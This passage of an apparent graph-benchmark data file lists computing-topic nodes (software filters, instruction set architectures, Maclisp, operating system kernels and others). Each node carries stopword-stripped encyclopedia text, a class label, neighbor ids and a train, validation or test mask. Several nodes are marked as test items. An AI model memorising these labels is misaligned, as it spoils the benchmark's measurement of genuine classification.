      3585,
      3586,
      9731,
      7689,
      3594,
      5645,
      9741,
      5649,
      3603,
      5663,
      1574,
      5673,
      7728,
      5681,
      5697,
      3654,
      9798,
      1632,
      3684,
      9844,
      3702,
      5754,
      1664,
      5769,
      1682,
      5785,
      3745,
      7845,
      7847,
      7854,
      7857,
      7858,
      3764,
      9908,
      9911,
      9913,
      9921,
      3783,
      9931,
      3791,
      5840,
      3793,
      7889,
      5844,
      9944,
      1755,
      7904,
      3815,
      7913,
      9964,
      5871,
      1776,
      7920,
      5883,
      1791,
      7938,
      1798,
      5898,
      9996,
      3857,
      7963,
      1820,
      3869,
      10012,
      10016,
      5922,
      5924,
      1832,
      3883,
      7983,
      1849,
      10051,
      3911,
      10062,
      10076,
      1915,
      3966,
      3971,
      3973,
      1937,
      1952,
      6049,
      10149,
      10151,
      4010,
      1964,
      8119,
      8120,
      8126,
      8131,
      4039,
      1998,
      2000,
      8162,
      4071,
      8168,
      4074,
      6129,
      6135,
      8186
    ],
    "mask": "None"
  },
  {
    "node_id": 5357,
    "label": 2,
    "text": "Filter_(software):filter software filter computer program subroutine process stream producing another stream single filter used individually frequently strung together form pipeline operating systems unix rich filter programs windows 7 later also rich filters include windows powershell comparison however filters built cmd.exe original command-line interface windows significant enhancements relative similar filter commands available ms-dos os x includes filters underlying unix base also automator allows filters known actions strung together form pipeline unix unix-like operating systems filter program gets data standard input main input stream writes main results standard output main output stream auxiliary input may come command line flags configuration files auxiliary output may go standard error command syntax getting data device file standard input input operator codice_1 similarly send data device file standard output output operator codice_2 append data lines existing output file one use append operator codice_3 filters may strung together pipeline pipe operator codice_4 operator signifies main output command left passed main input command right unix philosophy encourages combining small discrete tools accomplish larger tasks classic filter unix ken thompson doug mcilroy cites ingrained tools outlook irrevocably operating system later tools imitating simplest prints lines containing character string output following example finds registered users foo part username using cut command take first field username line unix system password file passing input grep searches input lines containing character string foo prints output common unix filter programs cat cut grep head sort uniq tail programs like awk sed used build quite complex filters fully programmable unix filters also used data scientists get quick overview file based dataset two standard filters early days dos-based computers find sort examples filters may used batch files *.bat *.cmd etc. use command shell environment many filters available built windows freeware shareware commercial programs number mimic function features filters unix filtering programs graphical user interface gui enable users design customized filter suit special data processing and/or data mining requirements windows command prompt inherited ms-dos commands improved added example windows server 2003 features six command-line filters modifying active directory chained piping dsadd dsget dsmod dsmove dsrm dsquery windows powershell adds entire host filters known cmdlets chained together pipe except simple ones e.g codice_5 following example gets list files codice_6 folder gets size sorts size ascending order shows three filters codice_7 codice_8 codice_9 chained pipes",
    "neighbors": [
      515,
      8582,
      7175,
      9735,
      9225,
      3856,
      10387,
      3733,
      3222,
      3990,
      5397,
      8341,
      11418,
      7325,
      929,
      9507,
      7983,
      11442,
      8644,
      333,
      9166,
      337,
      4561,
      9298,
      6617,
      2011,
      9053,
      8414,
      4321,
      3562,
      4074,
      8301,
      5492,
      4349
    ],
    "mask": "None"
  },
  {
    "node_id": 5358,
    "label": 3,
    "text": "Instruction_set_architecture:instruction set architecture instruction set architecture isa abstract model computer also referred architecture computer architecture realization isa called implementation isa permits multiple implementations may vary performance physical size monetary cost among things isa serves interface software hardware software written isa run different implementations isa enabled binary compatibility different generations computers easily achieved development computer families developments helped lower cost computers increase applicability reasons isa one important abstractions computing today isa defines everything machine language programmer needs know order program computer isa defines differs isas general isas define supported data types state main memory registers semantics memory consistency addressing modes instruction set set machine instructions comprises computer machine language input/output model instruction set architecture distinguished microarchitecture set processor design techniques used particular processor implement instruction set processors different microarchitectures share common instruction set example intel pentium advanced micro devices athlon implement nearly identical versions x86 instruction set radically different internal designs concept architecture distinct design specific machine developed fred brooks ibm design phase system/360 virtual machines support bytecode isa smalltalk java virtual machine microsoft common language runtime implement translating bytecode commonly used code paths native machine code addition virtual machines execute less frequently used code paths interpretation see just-in-time compilation transmeta implemented x86 instruction set atop vliw processors fashion isa may classified number different ways common classification architectural complexity complex instruction set computer cisc many specialized instructions may rarely used practical programs reduced instruction set computer risc simplifies processor efficiently implementing instructions frequently used programs less common operations implemented subroutines resulting additional processor execution time offset infrequent use types include long instruction word vliw architectures closely related long instruction word liw explicitly parallel instruction computing epic architectures architectures seek exploit instruction-level parallelism less hardware risc cisc making compiler responsible instruction issue scheduling architectures even less complexity studied minimal instruction set computer misc one instruction set computer oisc theoretically important types commercialized machine language built discrete statements instructions processing architecture given instruction may specify complex operations built combining simple instructions executed sequentially otherwise directed control flow instructions examples operations common many instruction sets include processors may include complex instructions instruction set single complex instruction something may take many instructions computers instructions typified instructions take multiple steps control multiple functional units otherwise appear larger scale bulk simple instructions implemented given processor examples complex instructions include complex instructions common cisc instruction sets risc instruction sets risc instruction sets may include well risc instruction sets generally include alu operations memory operands instructions move large blocks memory risc instruction sets include simd vector instructions perform arithmetic operation multiple pieces data time simd instructions ability manipulating large vectors matrices minimal time simd instructions allow easy parallelization algorithms commonly involved sound image video processing various simd implementations brought market trade names mmx 3dnow altivec traditional architectures instruction includes opcode specifies operation perform add contents memory register —and zero operand specifiers may specify registers memory locations literal data operand specifiers may addressing modes determining meaning may fixed fields long instruction word vliw architectures include many microcode architectures multiple simultaneous opcodes operands specified single instruction exotic instruction sets opcode field transport triggered architectures tta operand forth virtual machine 0-operand instruction sets lack operand specifier fields stack machines including nosc conditional instructions often predicate field—a bits encode specific condition cause operation performed rather performed example conditional branch instruction executed branch taken condition true execution proceeds different part program executed branch taken condition false execution continues sequentially instruction sets also conditional moves move executed data stored target location condition true executed target location modified condition false similarly ibm z/architecture conditional store instruction instruction sets include predicate field every instruction called branch predication instruction sets may categorized maximum number operands explicitly specified instructions due large number bits needed encode three registers 3-operand instruction risc architectures 16-bit instructions invariably 2-operand designs atmel avr ti msp430 versions arm thumb risc architectures 32-bit instructions usually 3-operand designs arm avr32 mips power isa sparc architectures instruction specifies number operands registers memory locations immediate values explicitly instructions give one operands implicitly stored top stack implicit register operands given implicitly fewer operands need specified instruction destination operand explicitly specifies destination additional operand must supplied consequently number operands encoded instruction may differ mathematically necessary number arguments logical arithmetic operation arity operands either encoded opcode representation instruction else given values addresses following instruction register pressure measures availability free registers point time program execution register pressure high large number available registers use thus higher register pressure often register contents must spilled memory increasing number registers architecture decreases register pressure increases cost embedded instruction sets thumb suffer extremely high register pressure small register sets general-purpose risc isas like mips alpha enjoy low register pressure cisc isas like x86-64 offer low register pressure despite smaller register sets due many addressing modes optimizations sub-register addressing memory operands alu instructions absolute addressing pc-relative addressing register-to-register spills cisc isas offer size length instruction varies widely little four bits microcontrollers many hundreds bits vliw systems processors used personal computers mainframes supercomputers instruction sizes 8 64 bits longest possible instruction x86 15 bytes 120 bits within instruction set different instructions may different lengths architectures notably reduced instruction set computers risc typically corresponding architecture word size architectures instructions variable length typically integral multiples byte halfword arm thumb-extension mixed variable encoding two fixed usually 32-bit 16-bit encodings instructions mixed freely must switched branch exception boundary armv8 risc instruction set normally fixed instruction length often 4 bytes 32 bits whereas typical cisc instruction set may instructions widely varying length 1 15 bytes x86 fixed-length instructions less complicated handle variable-length instructions several reasons check whether instruction straddles cache line virtual memory page boundary instance therefore somewhat easier optimize speed early computers memory expensive minimizing size program make sure would fit limited memory often central thus combined size instructions needed perform particular task code density important characteristic instruction set computers high code density often complex instructions procedure entry parameterized returns loops etc therefore retroactively named complex instruction set computers cisc however typical frequent cisc instructions merely combine basic alu operation add access one operands memory using addressing modes direct indirect indexed etc. certain architectures may allow two three operands including result directly memory may able perform functions automatic pointer increment etc software-implemented instruction sets may even complex powerful instructions reduced instruction-set computers risc first widely implemented period rapidly growing memory subsystems sacrifice code density simplify implementation circuitry try increase performance via higher clock frequencies registers single risc instruction typically performs single operation add registers load memory location register risc instruction set normally fixed instruction length whereas typical cisc instruction set instructions widely varying length however risc computers normally require often longer instructions implement given task inherently make less optimal use bus bandwidth cache memories certain embedded risc isas like thumb avr32 typically exhibit high density owing technique called code compression technique packs two 16-bit instructions one 32-bit instruction unpacked decode stage executed two instructions minimal instruction set computers misc form stack machine separate instructions 16-64 multiple instructions fit single machine word types cores often take little silicon implement easily realized fpga multi-core form code density misc similar code density risc increased instruction density offset requiring primitive instructions task research executable compression mechanism improving code density mathematics kolmogorov complexity describes challenges limits instructions constituting program rarely specified using internal numeric form machine code may specified programmers using assembly language commonly may generated programming languages compilers design instruction sets complex issue two stages history microprocessor first cisc complex instruction set computer many different instructions 1970s however places like ibm research found many instructions set could eliminated result risc reduced instruction set computer architecture uses smaller set instructions simpler instruction set may offer potential higher speeds reduced processor size reduced power consumption however complex set may optimize common operations improve memory cache efficiency simplify programming instruction set designers reserve one opcodes kind system call software interrupt example mos technology 6502 uses 00 zilog z80 uses eight codes c7 cf d7 df e7 ef f7 ff motorola 68000 use codes range a000..afff fast virtual machines much easier implement instruction set meets popek goldberg virtualization requirements nop slide used immunity-aware programming much easier implement unprogrammed state memory interpreted nop systems multiple processors non-blocking synchronization algorithms much easier implement instruction set includes support something fetch-and-add load-link/store-conditional ll/sc atomic compare-and-swap given instruction set implemented variety ways ways implementing particular instruction set provide programming model implementations instruction set able run executables various ways implementing instruction set give different tradeoffs cost performance power consumption size etc designing microarchitecture processor engineers use blocks hard-wired electronic circuitry often designed separately adders multiplexers counters registers alus etc kind register transfer language often used describe decoding sequencing instruction isa using physical microarchitecture two basic ways build control unit implement description although many designs use middle ways compromises designs use combination hardwired design microcode control unit cpu designs use writable control store—they compile instruction set writable ram flash inside cpu rekursiv processor imsys cjip fpga reconfigurable computing isa also emulated software interpreter naturally due interpretation overhead slower directly running programs emulated hardware unless hardware running emulator order magnitude faster today common practice vendors new isas microarchitectures make software emulators available software developers hardware implementation ready often details implementation strong influence particular instructions selected instruction set example many implementations instruction pipeline allow single memory load memory store per instruction leading load-store architecture risc another example early ways implementing instruction pipeline led delay slot demands high-speed digital signal processing pushed opposite direction—forcing instructions implemented particular way example perform digital filters fast enough mac instruction typical digital signal processor dsp must use kind harvard architecture fetch instruction two data words simultaneously requires single-cycle multiply–accumulate multiplier",
    "neighbors": [
      4098,
      6659,
      1029,
      7173,
      7687,
      8711,
      8715,
      8716,
      9739,
      528,
      1042,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      36,
      6181,
      8231,
      2088,
      10796,
      3630,
      2097,
      6705,
      7218,
      4156,
      1085,
      2623,
      2113,
      7234,
      3142,
      8262,
      74,
      4172,
      2638,
      10837,
      2137,
      7770,
      8795,
      9309,
      2655,
      1122,
      99,
      7269,
      7270,
      3175,
      6247,
      7783,
      6250,
      6252,
      6253,
      8815,
      6256,
      7281,
      9331,
      5237,
      630,
      8822,
      9337,
      10361,
      6268,
      3197,
      641,
      8322,
      4743,
      4237,
      10383,
      7313,
      8851,
      2708,
      663,
      9369,
      9371,
      8861,
      6815,
      8352,
      5793,
      6818,
      6821,
      2732,
      7852,
      9391,
      2224,
      7856,
      2226,
      7858,
      9908,
      9911,
      8890,
      1725,
      4285,
      4286,
      2241,
      2243,
      9932,
      5326,
      5329,
      5844,
      6868,
      9428,
      5335,
      10966,
      730,
      731,
      11487,
      7911,
      4841,
      10985,
      5356,
      9964,
      1776,
      5872,
      8944,
      10483,
      757,
      2805,
      10485,
      760,
      249,
      5368,
      9976,
      1788,
      7421,
      8700,
      1791,
      5378,
      6914,
      5380,
      2821,
      1798,
      3846,
      8450,
      1801,
      6924,
      6926,
      783,
      6415,
      8976,
      1298,
      11539,
      2838,
      1304,
      1818,
      8474,
      9500,
      2334,
      4386,
      2339,
      6950,
      8487,
      1321,
      810,
      9003,
      6957,
      3886,
      9009,
      10548,
      309,
      8501,
      8506,
      5948,
      11580,
      4928,
      833,
      6464,
      8514,
      9541,
      4423,
      6476,
      3919,
      7505,
      9044,
      11604,
      342,
      344,
      8539,
      4444,
      8543,
      1376,
      8551,
      10603,
      2925,
      9582,
      8048,
      4465,
      372,
      10612,
      11636,
      1399,
      11637,
      7033,
      1402,
      1915,
      3451,
      10620,
      5503,
      9599,
      1409,
      3457,
      2435,
      4998,
      4491,
      398,
      3470,
      5518,
      1425,
      5523,
      6038,
      407,
      409,
      11678,
      1952,
      8609,
      10145,
      10658,
      3493,
      9126,
      936,
      938,
      10669,
      1967,
      2480,
      4017,
      5040,
      10675,
      1461,
      4534,
      1463,
      7607,
      8120,
      2490,
      8125,
      4030,
      6078,
      8126,
      6084,
      453,
      3014,
      2503,
      1480,
      4553,
      6607,
      8143,
      977,
      466,
      1489,
      2514,
      2517,
      1499,
      2523,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      8680,
      9707,
      5612,
      1005,
      10220,
      6639,
      6128,
      10732,
      9714,
      499,
      4596,
      10734,
      10746,
      4603,
      508,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5359,
    "label": 2,
    "text": "List_of_disk_operating_systems:list disk operating systems list disk operating systems acronym dos used form names many simply referred dos within respective communities",
    "neighbors": [
      6148,
      8713,
      10508,
      7823,
      6289,
      532,
      7959,
      2201,
      4764,
      292,
      9006,
      689,
      178,
      8369,
      9907,
      10676,
      4409,
      6459,
      1853,
      7358,
      8767,
      10818,
      10564,
      8774,
      8902,
      9166,
      5220,
      10475,
      8301,
      2290,
      2933,
      4727
    ],
    "mask": "Test"
  },
  {
    "node_id": 5360,
    "label": 9,
    "text": "Lisp_Machine_Lisp:lisp machine lisp lisp machine lisp programming language dialect language lisp direct descendant maclisp initially developed mid late 1970s system programming language massachusetts institute technology mit lisp machines lisp machine lisp also lisp dialect influence design common lisp lisp machine lisp branched three dialects symbolics named variant zetalisp lisp machines inc. later texas instruments ti explorer would share common code base dialect lisp machine lisp would differ version maintained mit ai lab richard stallman others lisp machine manual describes lisp machine lisp language detail manual popularly termed chine nual full title printed across front back covers letters appeared front name sometimes abbreviated blending two words chinual lisp machine lisp features",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      7732,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      2179,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5361,
      242,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      8993,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      10581,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      5519,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      989,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 5361,
    "label": 9,
    "text": "Maclisp:maclisp maclisp maclisp sometimes styled maclisp maclisp programming language dialect language lisp originated massachusetts institute technology mit project mac derived prefix late 1960s based lisp 1.5 richard greenblatt main developer original codebase pdp-6 jon l. white responsible later maintenance development name maclisp began used early 1970s distinguish forks pdp-6 lisp notably bbn lisp maclisp descendant lisp 1.5 maclisp departs lisp 1.5 using value cell access store dynamic values variables lisp 1.5 used linear search association list determine variable value maclisp variable evaluation faster different variable semantics maclisp also employed reader macros make readable input output termed input/output i/o instead entering codice_1 one could enter codice_2 get s-expression although implementations put functions property list maclisp uses different syntax define functions maclisp also load-on-demand feature maclisp began digital equipment corporation pdp-6 pdp-10 computers running incompatible timesharing system later ported pdp-10 operating systems example timesharing total operating system tops-10 tops-20 original implementation assembly language later implementation multics used pl/i maclisp developed considerably lifetime major features added language systems would typically correspond major release numbers maclisp used implement macsyma computer algebra system cas symbolic algebra program macsyma development also drove several features maclisp shrdlu blocks-world program written maclisp language widespread use artificial intelligence ai research community early 1980s also used implement programming languages planner scheme multics maclisp used implement first lisp-based emacs maclisp influential lisp implementation longer maintained actively runs pdp-10 emulators used experimenting early ai programs maclisp began small fixed number data types cons cell atom later termed symbol integer floating-point number later additions included arrays never first-class data types arbitrary-precision integers bignums strings tuples objects except inums implemented pointers data type determined block memory pointed special case small numbers inums programs could interpreted compiled compiled behavior interpreted except local variables lexical default compiled code unless declared special error checking done inline operations car cdr ncomplr compiler mid-1970s introduced fast numeric support lisp languages generating machine code instructions arithmetic rather calling interpretive routines dispatched data type made lisp arithmetic comparable speed fortran scalar operations though fortran array loop implementation remained much faster original version limited 18-bit word memory address pdp-10 considerable effort expended keeping implementation lean simple multics maclisp far larger address space costly use memory processing power pdp-10 exceeded lisp machine invented lisp machine lisp direct descendant maclisp several lisp dialects also use need unify community resulted modern common lisp language maclisp named project mac unrelated apple macintosh mac computer predates decades various lisp systems macintosh particular similarity maclisp",
    "neighbors": [
      10752,
      4097,
      4101,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      6772,
      2166,
      5751,
      1147,
      7805,
      9345,
      1159,
      9865,
      655,
      9877,
      4774,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      6355,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      9969,
      8435,
      9975,
      2808,
      6906,
      7421,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1804,
      10510,
      273,
      5395,
      1301,
      791,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      8502,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      4981,
      3446,
      3960,
      377,
      10104,
      4992,
      7562,
      6556,
      6047,
      1952,
      10145,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      8173,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 5362,
    "label": 0,
    "text": "Eloquens_(software):eloquens software eloquens™ text-to-speech software whose first version released 1993 cselt first commercial speech synthesis software able speak italian first commercial product research center cselt field voice technology built diphone-technology aimed reach high computational efficiency result produced voice still robotic natural previous generation voice implemented musa cselt past eloquens applied automatically read timetables italian train stations telephone services provided telecom italia e.g automated address book service nowadays released freeware nowadays typically used spoken comments many youtube videos",
    "neighbors": [
      11042,
      3533,
      6797,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5363,
    "label": 3,
    "text": "Kernel_(operating_system):kernel operating system kernel computer program core computer operating system complete control everything system systems one first programs loaded start-up bootloader handles rest start-up well input/output requests software translating data-processing instructions central processing unit handles memory peripherals like keyboards monitors printers speakers critical code kernel usually loaded separate area memory protected access application programs less critical parts operating system kernel performs tasks running processes managing hardware devices hard disk handling interrupts protected kernel space contrast application programs like browsers word processors audio video players use separate area memory user space separation prevents user data kernel data interfering causing instability slowness well preventing malfunctioning application programs crashing entire operating system kernel interface low-level abstraction layer process makes requests kernel called system call kernel designs differ manage system calls resources monolithic kernel runs operating system instructions address space speed microkernel runs processes user space modularity kernel primary function mediate access computer resources including key aspects necessary resource management definition execution domain address space protection mechanism used mediate access resources within domain kernels also provide methods synchronization inter-process communication ipc implementations may within kernel kernel also rely processes running although kernel must provide inter-process communication order provide access facilities provided kernels must also provide running programs method make requests access facilities kernel full access system memory must allow processes safely access memory require often first step virtual addressing usually achieved paging and/or segmentation virtual addressing allows kernel make given physical address appear another address virtual address virtual address spaces may different different processes memory one process accesses particular virtual address may different memory another process accesses address allows every program behave one apart kernel running thus prevents applications crashing many systems program virtual address may refer data currently memory layer indirection provided virtual addressing allows operating system use data stores like hard drive store would otherwise remain main memory ram result operating systems allow programs use memory system physically available program needs data currently ram cpu signals kernel happened kernel responds writing contents inactive memory block disk necessary replacing data requested program program resumed point stopped scheme generally known demand paging virtual addressing also allows creation virtual partitions memory two disjointed areas one reserved kernel kernel space applications user space applications permitted processor address kernel memory thus preventing application damaging running kernel fundamental partition memory space contributed much current designs actual general-purpose kernels almost universal systems although research kernels e.g singularity take approaches perform useful functions processes need access peripherals connected computer controlled kernel device drivers device driver computer program enables operating system interact hardware device provides operating system information control communicate certain piece hardware driver important vital piece program application design goal driver abstraction function driver translate os-mandated abstract function calls programming calls device-specific calls theory device work correctly suitable driver device drivers used things video cards sound cards printers scanners modems lan cards common levels abstraction device drivers 1 hardware side 2 software side example show user something screen application would make request kernel would forward request display driver responsible actually plotting character/pixel kernel must maintain list available devices list may known advance e.g embedded system kernel rewritten available hardware changes configured user typical older pcs systems designed personal use detected operating system run time normally called plug play plug play system device manager first performs scan different hardware buses peripheral component interconnect pci universal serial bus usb detect installed devices searches appropriate drivers device management os-specific topic drivers handled differently kind kernel design every case kernel provide i/o allow drivers physically access devices port memory location important decisions made designing device management system designs accesses may involve context switches making operation cpu-intensive easily causing significant performance overhead computing system call process requests service operating system kernel normally permission run system calls provide interface process operating system operations interacting system require permissions available user level process e.g i/o performed device present system form communication processes requires use system calls system call mechanism used application program request service operating system use machine-code instruction causes processor change mode example would supervisor mode protected mode operating system performs actions like accessing hardware devices memory management unit generally operating system provides library sits operating system normal programs usually c library glibc windows api library handles low-level details passing information kernel switching supervisor mode system calls include close open read wait write actually perform useful work process must able access services provided kernel implemented differently kernel provide c library api turn invokes related kernel functions method invoking kernel function varies kernel kernel memory isolation use impossible user process call kernel directly would violation processor access control rules possibilities important consideration design kernel support provides protection faults fault tolerance malicious behaviours security two aspects usually clearly distinguished adoption distinction kernel design leads rejection hierarchical structure protection mechanisms policies provided kernel classified according several criteria including static enforced compile time dynamic enforced run time pre-emptive post-detection according protection principles satisfy e.g denning whether hardware supported language based whether open mechanism binding policy many support hierarchical protection domains typically implemented using cpu modes many kernels provide implementation capabilities i.e objects provided user code allow limited access underlying object managed kernel common example occurs file handling file representation information stored permanent storage device kernel may able perform many different operations e.g read write delete execute file contents user level application may permitted perform operations e.g may allowed read file common implementation kernel provide object application typically called file handle application may invoke operations validity kernel checks time operation requested system may extended cover objects kernel manages indeed objects provided user applications efficient simple way provide hardware support capabilities delegate mmu responsibility checking access-rights every memory access mechanism called capability-based addressing commercial computer architectures lack mmu support capabilities alternative approach simulate capabilities using commonly supported hierarchical domains approach protected object must reside address space application access kernel also maintains list capabilities memory application needs access object protected capability performs system call kernel checks whether application capability grants permission perform requested action permitted performs access either directly delegating request another user-level process performance cost address space switching limits practicality approach systems complex interactions objects used current operating systems objects accessed frequently expected perform quickly approaches protection mechanism firmware supported instead simulated higher levels e.g simulating capabilities manipulating page tables hardware direct support possible performance implications lack hardware support may issue however systems choose use language-based protection important kernel design decision choice abstraction levels security mechanisms policies implemented kernel security mechanisms play critical role supporting security higher levels one approach use firmware kernel support fault tolerance see build security policy malicious behavior top adding features cryptography mechanisms necessary delegating responsibility compiler approaches delegate enforcement security policy compiler and/or application level often called language-based security lack many critical security mechanisms current mainstream operating systems impedes implementation adequate security policies application abstraction level fact common misconception computer security security policy implemented application regardless kernel support typical computer systems today use hardware-enforced rules programs allowed access data processor monitors execution stops program violates rule e.g. user process read write kernel memory systems lack support capabilities processes isolated using separate address spaces calls user processes kernel regulated requiring use one above-described system call methods alternative approach use language-based protection language-based protection system kernel allow code execute produced trusted language compiler language may designed impossible programmer instruct something violate security requirement advantages approach include disadvantages include examples systems language-based protection include jx microsoft singularity edsger dijkstra proved logical point view atomic lock unlock operations operating binary semaphores sufficient primitives express functionality process cooperation however approach generally held lacking terms safety efficiency whereas message passing approach flexible number approaches either lower- higher-level available well many modern kernels providing support systems shared memory remote procedure calls idea kernel i/o devices handled uniformly processes parallel co-operating processes first proposed implemented brinch hansen although similar ideas suggested 1967 hansen description common processes called internal processes i/o devices called external processes similar physical memory allowing applications direct access controller ports registers cause controller malfunction system crash depending complexity device devices get surprisingly complex program use several different controllers providing abstract interface manage device important interface normally done device driver hardware abstraction layer frequently applications require access devices kernel must maintain list devices querying system way done bios one various system buses pci/pcie usb application requests operation device displaying character kernel needs send request current active video driver video driver turn needs carry request example inter process communication ipc naturally listed tasks features provided many ways differ design implementation principle separation mechanism policy substantial difference philosophy micro monolithic kernels mechanism support allows implementation many different policies policy particular mode operation instance mechanism may provide user log-in attempts call authorization server determine whether access granted policy may authorization server request password check encrypted password stored database mechanism generic policy could easily changed e.g requiring use security token mechanism policy integrated module minimal microkernel basic policies included mechanisms allows running top kernel remaining part operating system applications decide policies adopt memory management high level process scheduling file system management etc. monolithic kernel instead tends include many policies therefore restricting rest system rely per brinch hansen presented arguments favour separation mechanism policy failure properly fulfill separation one major causes lack substantial innovation existing operating systems problem common computer architecture monolithic design induced kernel mode user mode architectural approach protection technically called hierarchical protection domains common conventional commercial systems fact every module needing protection therefore preferably included kernel link monolithic design privileged mode reconducted key issue mechanism-policy separation fact privileged mode architectural approach melds together protection mechanism security policies major alternative architectural approach capability-based addressing clearly distinguishes two leading naturally microkernel design see separation protection security monolithic kernels execute code address space kernel space microkernels try run services user space aiming improve maintainability modularity codebase kernels fit exactly one categories rather found two designs called hybrid kernels exotic designs nanokernels exokernels available seldom used production systems xen hypervisor example exokernel monolithic kernel os services run along main kernel thread thus also residing memory area approach provides rich powerful hardware access developers unix developer ken thompson maintain easier implement monolithic kernel microkernels main disadvantages monolithic kernels dependencies system components bug device driver might crash entire system fact large kernels become difficult maintain monolithic kernels traditionally used unix-like operating systems contain operating system core functions device drivers traditional design unix systems monolithic kernel one single program contains code necessary perform every kernel-related task every part accessed programs put library kernel space device drivers scheduler memory handling file systems network stacks many system calls provided applications allow access services monolithic kernel initially loaded subsystems may needed tuned point fast faster one specifically designed hardware although relevant general sense modern monolithic kernels linux freebsd fall category unix-like operating systems feature ability load modules runtime thereby allowing easy extension kernel capabilities required helping minimize amount code running kernel space monolithic kernel advantages hinge points work monolithic kernel done via system calls interfaces usually kept tabular structure access subsystem within kernel disk operations essentially calls made within programs checked copy request passed system call hence far travel monolithic linux kernel made extremely small ability dynamically load modules also ease customization fact versions small enough fit together large number utilities programs single floppy disk still provide fully functional operating system one popular mulinux ability miniaturize kernel also led rapid growth use linux embedded systems types kernels consist core functions operating system device drivers ability load modules runtime provide rich powerful abstractions underlying hardware provide small set simple hardware abstractions use applications called servers provide functionality particular approach defines high-level virtual interface hardware set system calls implement operating system services process management concurrency memory management several modules run supervisor mode design several flaws limitations microkernel also abbreviated μk uk term describing approach operating system design functionality system moved traditional kernel set servers communicate minimal kernel leaving little possible system space much possible user space microkernel designed specific platform device ever going needs operate microkernel approach consists defining simple abstraction hardware set primitives system calls implement minimal os services memory management multitasking inter-process communication services including normally provided kernel networking implemented user-space programs referred servers microkernels easier maintain monolithic kernels large number system calls context switches might slow system typically generate overhead plain function calls parts really require privileged mode kernel space ipc inter-process communication basic scheduler scheduling primitives basic memory handling basic i/o primitives many critical parts running user space complete scheduler memory handling file systems network stacks micro kernels invented reaction traditional monolithic kernel design whereby system functionality put one static program running special system mode processor microkernel fundamental tasks performed able access necessarily hardware manage memory coordinate message passing processes systems use micro kernels qnx hurd case qnx hurd user sessions entire snapshots system views referred essence microkernel architecture illustrates advantages micro kernels use message passing system sort handle requests one server another message passing system generally operates port basis microkernel example request memory sent port opened microkernel request sent within microkernel steps similar system calls rationale would bring modularity system architecture would entail cleaner system easier debug dynamically modify customizable users needs performing part operating systems like gnu hurd minix mklinux qnx redox os although micro kernels small combination required auxiliary code fact often larger monolithic kernels advocates monolithic kernels also point two-tiered structure microkernel systems operating system interact directly hardware creates not-insignificant cost terms system efficiency types kernels normally provide minimal services defining memory address spaces inter-process communication ipc process management functions running hardware processes handled directly micro kernels proponents micro kernels point monolithic kernels disadvantage error kernel cause entire system crash however microkernel kernel process crashes still possible prevent crash system whole merely restarting service caused error services provided kernel networking implemented user-space programs referred servers servers allow operating system modified simply starting stopping programs machine without networking support instance networking server started task moving kernel move data various applications servers creates overhead detrimental efficiency micro kernels comparison monolithic kernels disadvantages microkernel exist however disadvantages micro kernels extremely context based example work well small single purpose critical systems many processes need run complications process management effectively mitigated microkernel allows implementation remaining part operating system normal application program written high-level language use different operating systems top unchanged kernel also possible dynamically switch among operating systems one active simultaneously computer kernel grows grows size vulnerability trusted computing base besides reducing security problem enlarging memory footprint mitigated degree perfecting virtual memory system computer architectures virtual memory support reduce kernel footprint extensive editing performed carefully remove unneeded code difficult non-obvious interdependencies parts kernel millions lines code early 1990s due various shortcomings monolithic kernels versus microkernels monolithic kernels considered obsolete virtually operating system researchers result design linux monolithic kernel rather microkernel topic famous debate linus torvalds andrew tanenbaum merit sides argument presented tanenbaum–torvalds debate monolithic kernels designed code address space kernel space developers argue necessary increase performance system developers also maintain monolithic systems extremely efficient well written monolithic model tends efficient use shared kernel memory rather slower ipc system microkernel designs typically based message passing performance microkernels poor 1980s early 1990s however studies empirically measured performance microkernels analyze reasons inefficiency explanations data left folklore assumption due increased frequency switches kernel-mode user-mode increased frequency inter-process communication increased frequency context switches fact guessed 1995 reasons poor performance microkernels might well 1 actual inefficiency whole microkernel approach 2 particular concepts implemented microkernels 3 particular implementation concepts therefore remained studied solution build efficient microkernel unlike previous attempts apply correct construction techniques end hierarchical protection domains architecture leads design monolithic kernel significant performance drawback time interaction different levels protection i.e process manipulate data structure 'user mode 'supervisor mode since requires message copying value mid-1990s researchers abandoned belief careful tuning could reduce overhead dramatically recently newer microkernels optimized performance l4 k42 addressed problems hybrid kernels used commercial operating systems microsoft windows nt 3.1 nt 3.5 nt 3.51 nt 4.0 2000 xp vista 7 8 8.1 10 apple inc macos uses hybrid kernel called xnu based upon code osf/1 mach kernel 